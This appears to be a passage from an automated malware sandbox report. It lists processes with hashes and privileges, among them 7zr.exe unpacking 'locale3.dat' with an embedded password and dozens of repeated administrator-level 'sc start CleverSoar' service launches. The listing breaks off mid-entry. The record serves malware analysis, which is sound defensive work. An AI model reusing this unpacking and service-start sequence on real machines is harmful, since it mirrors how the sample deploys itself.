                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:22:52:08
                            Start date:23/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x710000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:13
                            Start time:22:52:08
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff6ef0c0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:26
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:22:52:09
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6d64d0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:22:52:10
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:22:52:11
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:22:52:12
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7aa420000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:22:52:13
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6209b0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
